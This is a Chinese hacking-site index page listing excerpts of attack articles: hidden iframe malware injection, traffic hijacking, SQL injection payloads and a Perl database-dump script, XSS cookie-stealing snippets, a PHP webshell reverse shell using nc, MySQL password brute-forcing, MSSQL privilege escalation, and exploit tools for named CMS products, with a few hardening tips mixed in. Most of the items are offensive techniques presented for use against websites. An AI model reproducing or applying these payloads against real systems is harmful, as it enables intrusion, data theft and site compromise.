内容字号:默认大号超大号

段落设置:段首缩进取消段首缩进

字体设置:切换到微软雅黑切换到宋体

  • 各种网页挂马方式原理揭密(iframe挂马,script 挂马,图片伪装挂马等)06月08日

    下面介绍集中常见的网页挂马方式: (1)iframe 框架挂马 在网页上增加一行挂马的程序,例如: iframe src=http://www.xxx.com/xxx.html width=0 height=0/iframe 这种嵌入是的挂马非常常见,在Google中搜索发现的可能还有木马的网页,一般都是被这种方式挂

  • 劫持流量原理是什么?关于劫持流量的种类和产生01月26日

    在鼠标点击的一刹那,流量在用户系统中流过层层节点,在路由的指引下奔向远程服务器。这段路程中短兵相接的战斗往往是最激烈的,在所有流量可能路过的节点往往都埋伏着劫持者,流量劫持的手段也层出不穷,从主页配置篡改、hosts劫持、进程Hook、启动劫持、LS

  • 中国南海和东南亚问题相关的网络攻击组织,捕获Patchwork APT攻击详细介绍10月28日

    南海仲裁这样的闹剧昨天还是宣布了一个可笑的判决,我泱泱大国昨天在海南广东等地派出的各种军队战舰证明这次我们可不是说着玩玩。“若有战,召必回”湿了多少人的眼眶。这边,黑客军团里,也开始借南海问题各种攻击。

  • 科讯kesion 6.x – 7.06 SQL 注射漏洞VBS版利用工具第二版04月25日

    我就随便改进了下,希望用的到的朋友可以收藏。 第二版改进: 1.检测2条漏洞 2.解决access数据库也出现什么差异备份等脚本上需要优化的问题。 其他也没什么了。 本文转载自『半坑土农民's Blog』 科讯kesion 6.x 7.06 SQL VBS Exp 第二版

  • ECSHOP php商城系统过滤不严导致SQL注入漏洞04月23日

    影响版本: ECSHOP 2.7.2 Release 0604 程序介绍: ECSHOP是一款开源免费的网上商店系统。由专业的开发团队升级维护,为您提供及时高效的技术支持,您还可以根据自己的商务特征对ECSHOP进行定制,增加自己商城的特色功能。 漏洞分析: 在include_libcommon.php中

  • DEDECMS网站管理系统模板执行漏洞(影响版本v5.6)04月22日

    影响版本: DEDECMS v5.6 Final 程序介绍: DedeCms 基于PHP+MySQL的技术开发,支持Windows、Linux、Unix等多种服务器平台,从2004年开始发布第一个版本开始,至今已经发布了五个大版本。DedeCms以简单、健壮、灵活、开源几大特点占领了国内CMS的大部份市场,目

  • 网站被SQL注入防范(WebKnight)04月21日

    网站被成功注入,网站一些页面被插入了下载病毒的代码,经查: 生产服务器的代码没有任何被改动过的迹象,排除服务器被入侵,代码被篡改的可能; 有病毒下载代码的部分,在数据库里真实看到了篡改迹象,可以排除ARP欺骗的可能; 同上,能确定网站被SQL注入攻

  • 手工注入方法,方便大家测试程序漏洞04月20日

    1、加入单引号 提交, 结果:如果出现错误提示,则该网站可能就存在注入漏洞。 2、数字型判断是否有注入; 语句:and 1=1 ;and 1=2 (经典)、' and '1'=1(字符型) 结果:分别返回不同的页面,说明存在注入漏洞. 分析:and 的意思是和如果没有过滤我们的语句,and

  • XSS漏洞报告04月19日

    一、什么是XSS XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。XSS属于被动式的攻击,因为其被动且不好利用,所以

  • XSS 攻击常用脚本04月18日

    1、这个应该都知道 scriptalert(test)/script 常用于测试 是否存在跨站 2、scriptwindow.alert(document.cookie);/script 这句代码将会弹出壹个包含有浏览者cookie信息的对话框,如果用户已经通过帐号登陆网站,在显示的cookie信息中将会包含有用户的账户名和

  • PHP Webshell 下的端口反弹方法04月17日

    使用方法:需要将以下代码保存为一个单独的php文件。上传到服务器之后,本地NC监听一个端口,在代码里设置好反弹IP和端口,然后直接访问上传的php文件,就会给 NC 弹回来一个shell。 测试实例:先在本地执行 nc -vv -l -p port,然后访问这个php页面 http://

  • 万博企业网站管理系统注入漏洞(MemberLogin.asp)04月16日

    这两天拿站的时候,好几回都遇到个叫万博的企业管理系统,今天有时间就下载过来看了看,找到了个注入漏洞,郁闷的是,得手工,没法用工具,累人的事。因为已经找到了一个,我就没兴趣接着往下看了。 这个注入漏洞发生在html/MemberLogin.asp文件里,在Include

  • PJBlog3 V3.2.8.352文件Action.asp修改任意用户密码04月15日

    发布日期:2011-06.19 发布作者:佚名 影响版本:PJBlog3 V3.2.8.352 漏洞类型:设计错误 漏洞描述:PJBlog一套开源免费的中文个人博客系统程序,采用asp+Access的技术,具有相当高的运作效能以及更新率,也支持目前Blog所使用的新技术 在文件Action.asp中:

  • mysql注入导库脚本代码04月13日

    复制代码 代码如下: #!/usr/bin/perl -w #www.sh3llc0de.com #转载须注明 #语法 自己改改 use strict; use LWP::Simple; use utf8; $|++; my $count = 1; for ($count = 1; $count = 600_000; $count++) { print 'ID: ', $count, "\n"; my $url = 'http://ww

  • BOSSI 公司企业网站管理系统注入&上传漏洞利用04月11日

    让不懂编写网页的人也可以有自己的公司(企业)网站,基本资料都在后台管理添加修改,网站的标题、地址、版权、公司邮局、收藏等资料可以在后台的公司资料里管理 ---------------------------------------------------- 漏洞一:注入漏洞, 漏洞页面:NewsInfo.a

  • MSSQL 2005 入侵提权过程分享04月10日

    文章作者:udb311 前言:本文主要以SQL 2005提权为主,讲述过程种发现的一些问题和成功经验。至少拿到shell的过程不在细说。 前期 在拿到一个webshell 后对提权进行分析如下。 1、serv-u 6.4.0. 2、mssql sa密码权限 3、sogou拼音输入 观察完毕后发现这个服务

  • PHP Mysql 密码暴力破解代码,本机暴力破解 3306 端口04月08日

    传到WebShell上去暴力破解本机的MySql数据库Root或其它用户的密码,因为是破解本机,所以速度奇快无比,貌似还有点效果,这个以前有人发过,这个是我改过的。已知有一处Bug,不清楚为何,密码数量少的时候,准确率100%,但是当密码数量达到5000以上时,准确率

  • 设置.net1.1 .net2.0安全 防止iisspy 防止aspx木马等04月07日

    设置.net1.1安全: 修改C:\WINDOWS\Microsoft.net\Framework\v1.1.4322\CONFIG\machine.config 文件. identity impersonate=false userName= password=/ 改为 identity impersonate=true userName= password=/ 参考资料:http://msdn.microsoft.com/zh-cn/lib

  • PHP+MySQL手工注入语句大全 MySQL手工注入语句总结04月06日

    暴字段长度 Order by num/* 匹配字段 and 1=1 union select 1,2,3,4,5.n/* 暴字段位置 and 1=2 union select 1,2,3,4,5..n/* 利用内置函数暴数据库信息 version() database() user() 不用猜解可用字段暴数据库信息(有些网站不适用): and 1=2 union all selec

  • PHP 双字节、宽字节编码漏洞04月05日

    代码如下: 还是用一个demo.php显示效果,代码如下: 复制代码 代码如下: ?php header("Content-Type:text/html;Charset=gb2312"); echo $_GET["str"]; //受污染的,但还有gpc echi "br/"; echo addslashes($_GET["str"]); //调用addslashes函数过滤有害字符

© 2002-2017 dngsw.cn 电脑高手网 版权所有

粤ICP备13005586号-3